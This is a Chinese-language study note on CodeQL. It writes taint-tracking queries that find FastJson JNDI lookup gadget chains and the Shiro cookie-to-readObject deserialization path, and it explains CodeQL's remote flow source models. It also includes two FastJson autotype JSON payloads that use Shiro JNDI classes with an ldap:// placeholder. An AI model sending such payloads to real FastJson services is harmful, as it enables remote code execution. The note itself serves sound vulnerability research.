CodeQL 学习小记

FastJson JNDI 分析

方向

首先，我们先要明确现在是已知漏洞点和步入条件，由此来尝试获取其他未知的链

比如需要满足以下条件的setter

- 函数名长度 >= 4
- 非静态函数
- 返回类型要么是void要么是当前类
- 参数只有一个
- 方法名需要以set开头

----

满足以下条件的getter

- 函数名长度 >= 4
- 非静态函数
- 函数名称以get起始，且第四个字符为大写字母
- 函数没有入参
- 继承自Collection || Map || AtomicBoolean || AtomicInteger || AtomicLong

首先编译好数据库，然后开始着手 QL 查询文件

QL

I. 定义 JNDI 相关方法

第一步，由于我们目标 sink 是 JNDI 相关类下的 lookup 方法，所以先定义目标方法

class JNDIMethod extends Method {
    JNDIMethod() {
        this.getDeclaringType().hasQualifiedName("javax.naming", "Context") and
        this.hasName("lookup")
    }
}

来解释下各行的内容，之后的学习就不再赘述

Line 1: 首先自定义的类要继承 Codeql 提供的 Method 类，用于遴选出我们想要的方法
Line 3、4: 这两行的作用即满足这些限制条件，那么this应是我们想要的方法

其中，对限制条件中用到的函数做一些解释

Member::getDeclaringType -> RefType 获取定义当前方法的类
RefType::getAnAncestor -> RefType 获取当前类的直接或间接父类，包括其自身
Member::hasQualifiedName -> predicate 获取在此类在指定 package 中以指定 name 声明

所以整个限制条件直接翻译就是：寻找名为 lookup 的方法所在类，且此类应在javax.naming中被声明为Context类，即查找 javax.naming.Context#lookup

class JNDIMethod extends Method {
    JNDIMethod() {
        this.getDeclaringType().hasQualifiedName("javax.naming", "Context") and
        this.hasName("lookup")
    }
}

II. 设定(全局)污点跟踪

Source

函数解释

FieldAccesses::getSite -> Callable 获取当前字段所在表达式的直接封闭可调用对象（细品
Element::getName -> string 获取当前元素的命名

isSource 检测是否存在某个对字段的访问的表达式，是在名为 getXXX 或 setXXX 的函数中，是的话则将此字段入口设置为搜寻的 source（起点）

override predicate isSource(DataFlow::Node node) {
    exists(FieldAccess fac | (
            fac.getSite().getName().indexOf("get") = 0 or
            fac.getSite().getName().indexOf("set") = 0
        ) and node.asExpr() = fac
    )
}

Sink

函数解释

MethodAccess::getMethod -> Method 返回当前方法入口的方法（绕口

isSink 检测是否存在某个方法是 JNDIMethod 的实例，且第一个参数可控，是的话将此方法入口设置为搜寻的 sink（终点）

override predicate isSink(DataFlow::Node node) {
    exists(MethodAccess md | (
            md.getMethod() instanceof JNDIMethod and
            node.asExpr() = md.getArgument(0)
        )
    )
}

III. 执行搜索

说实话看官方文档没太看懂 DataFlow DataFlow2 有啥区别

Configuration::hasFlowPath -> predicate 获取满足从 source 流向 sink 的数据

from MyTaintTraking conf, DataFlow2::PathNode source, DataFlow2::PathNode sink
where conf.hasFlowPath(source, sink)
select ...

Metadata 设置

/**
 * @kind path-problem
 */

import java
import semmle.code.java.dataflow.FlowSources
import semmle.code.java.dataflow.TaintTracking2
import DataFlow2::PathGraph

class JNDIMethod extends Method {
    JNDIMethod() {
        this.getDeclaringType().hasQualifiedName("javax.naming", "Context") and
        this.hasName("lookup")
    }
}


class MyTaintTraking extends TaintTracking2::Configuration {
    MyTaintTraking() { this = "MyTaintTraking" }

    override predicate isSource(DataFlow::Node node) {
        exists(FieldAccess fac | (
                fac.getSite().getName().indexOf("get") = 0 or
                fac.getSite().getName().indexOf("set") = 0
            ) and node.asExpr() = fac
        )
    }

    override predicate isSink(DataFlow::Node node) {
        exists(MethodAccess md | (
                md.getMethod() instanceof JNDIMethod and
                node.asExpr() = md.getArgument(0)
            )
        )
    }
}

from MyTaintTraking conf, DataFlow2::PathNode source, DataFlow2::PathNode sink
where conf.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "JNDI lookup might include name from [email protected]", source.getNode(), "this user input"

IV. 分析结果

最后成功执行会有 alerts 信息，本次有三条，但实际是两条链，中间因为有if...else...结构导致 Path 看起来多，结果中的 Path 从上到下即是从 source 到 sink 的过程

JndiObjectFactory

对应 Payload

{
    "@type": "org.apache.shiro.jndi.JndiObjectFactory",
    "resourceName": "ldap://xxxx"
}

JndiRealmFactory

对应 Payload

{
    "@type": "org.apache.shiro.realm.jndi.JndiRealmFactory",
    "jndiNames": [
        "ldap://xxxx"
    ]
}

Shiro Deserialize 分析

我们知道序列化的终点是java.io.ObjectInputStream#readObject即可以作为 sink，那么关键点在于如何设定 source

QL

首先我们确定肯定是从某个字段最终流向反序列化执行，所以这里 source 设置为所有字段

/**
 * @kind path-problem
 */

import java
import semmle.code.java.dataflow.TaintTracking2
import semmle.code.java.dataflow.FlowSources
import DataFlow2::PathGraph


class DeseializationMethod extends Method {
    DeseializationMethod() {
        this.getDeclaringType().hasQualifiedName("java.io", "ObjectInputStream") and
        this.hasName("readObject")
    }
}

class MyTaintTest extends TaintTracking2::Configuration {
    MyTaintTest() { this = "MyTaintTest"}

    override predicate isSource (DataFlow::Node node) {
        exists(FieldAccess fda | fda = node.asExpr())
    }

    override predicate isSink(DataFlow::Node node) { 
        exists(MethodAccess mda | 
            mda = node.asExpr() and 
            mda.getMethod() instanceof DeseializationMethod
        )
    }
}

from MyTaintTest conf, DataFlow2::PathNode source, DataFlow2::PathNode sink
where conf.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "from [email protected]", source.getNode(), "this user input"

得出的结果实际卡在 AbstractRememberMeManager，说明向上的 source 断了

优化 Source

按大佬给的 RemoteFlowSource（至于它本身代表什么稍后再说）作为 source，上面的代码基本不动，只是修改 isSource 判断逻辑

override predicate isSource (DataFlow::Node node) {
    node instanceof RemoteFlowSource
}

可以看到 Path 直接跟到了 SimpleCookie，基本上达到了入口点的位置，中间的变量传递也帮我们识别解决了

RemoteFlowSource

代码位于/java/ql/lib/semmle/code/java/dataflow/FlowSources.qll，主要识别各种可用于污染跟踪的流源

因为有很多子类，不好确定到底是哪个类型触发的，将输出改为source.getNode().getAQlClass()我们能获取到以下内容，可以知道关键在于ExternalRemoteFlowSource

ExternalRemoteFlowSource

定义很简单，主要是 sourceNode 方法

private class ExternalRemoteFlowSource extends RemoteFlowSource {
  ExternalRemoteFlowSource() { sourceNode(this, "remote") }

  override string getSourceType() { result = "external" }
}

方法定义于/java/ql/lib/semmle/code/java/dataflow/ExternalFlow.qll#L723

predicate sourceNode(Node node, string kind) {
    exists(InterpretNode n | isSourceNode(n, kind) and n.asNode() = node)
}

这里就不再往下深入跟方法了，我们来看看它所在的 ExternalFlow 的内容，这里的注释很关键也方便理解，由于篇幅的缘故不放上来，自行查阅，我们关注以下内容

The CSV specification has the following columns:
 - Sources:
   `namespace; type; subtypes; name; signature; ext; output; kind`
 - Sinks:
   `namespace; type; subtypes; name; signature; ext; input; kind`
 - Summaries:
   `namespace; type; subtypes; name; signature; ext; input; output; kind`

The `kind` column is a tag that can be referenced from QL to determine to which classes the interpreted elements should be added. For example, for sources "remote" indicates a default remote flow source, and for summaries "taint" indicates a default additional taint step and "value" indicates a globally applicable value-preserving step.

根据上面理解 kind 的作用，大致意思就是对 source 进行解析，并通过 kind 来标记三种类型

remote : 远程流的 source
taint : 附加污点进行跟踪
value : 全局保留值

private predicate sourceModelCsv(string row) {
  row =
    [ ...
    // CookieGet*
      "javax.servlet.http;Cookie;false;getValue;();;ReturnValue;remote",
      "javax.servlet.http;Cookie;false;getName;();;ReturnValue;remote",
      "javax.servlet.http;Cookie;false;getComment;();;ReturnValue;remote",
    ...
    ]

private predicate summaryModelCsv(string row) {
  row =
    [ ...
    // arg to return
      "java.nio;ByteBuffer;false;wrap;(byte[]);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Encoder;false;encode;(byte[]);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Encoder;false;encode;(ByteBuffer);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Encoder;false;encodeToString;(byte[]);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Encoder;false;wrap;(OutputStream);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Decoder;false;decode;(byte[]);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Decoder;false;decode;(ByteBuffer);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Decoder;false;decode;(String);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Decoder;false;wrap;(InputStream);;Argument[0];ReturnValue;taint",
      "cn.hutool.core.codec;Base64;true;decode;;;Argument[0];ReturnValue;taint",
      "org.apache.shiro.codec;Base64;false;decode;(String);;Argument[0];ReturnValue;taint",
      ...
    ]

由此，关键的点 CodeQL 官方已经帮我们识别主流框架中的数据源，并通过将一些变量传递点设为污染连接起来，省去了很多麻烦，不过同时由于限定于这些内容，对于完全自行开发的代码内容就没有那么有效了（如果有这种项目也是神奇）

参考资料

从Java反序列化漏洞题看CodeQL数据流